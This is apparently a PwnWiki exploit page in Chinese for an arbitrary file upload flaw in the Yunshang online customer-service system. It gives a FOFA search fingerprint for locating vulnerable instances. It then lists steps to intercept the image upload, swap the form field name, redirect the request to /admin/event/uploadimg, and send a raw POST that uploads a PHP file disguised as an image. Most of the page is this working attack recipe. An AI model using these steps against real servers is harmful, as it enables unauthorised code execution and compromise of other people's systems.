雲尚在線客服系統任意文件上傳漏洞

FOFA

body="cgwl.ico"

漏洞利用

訪問

/index/index/home?visiter_id=&visiter_name=&avatar=&business_id=1&groupid=0&special=1
//默認ID為1 接入客服 點擊圖片上傳抓包
參數修改
Content-Disposition: form-data; name="upload"
修改為
Content-Disposition: form-data; name="editormd-image-file"

POST請求
/admin/event/upload
改為
/admin/event/uploadimg
POST /admin/event/uploadimg HTTP/1.1
Host: target
...

Content-Disposition: form-data; name="editormd-image-file"; filename="1.jpg.php"
Content-Type: image/png

Anonymous

Search

雲尚在線客服系統任意文件上傳漏洞

Namespaces

More

Page actions

FOFA

漏洞利用

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

雲尚在線客服系統任意文件上傳漏洞

FOFA

漏洞利用

Navigation

Wiki tools

Page tools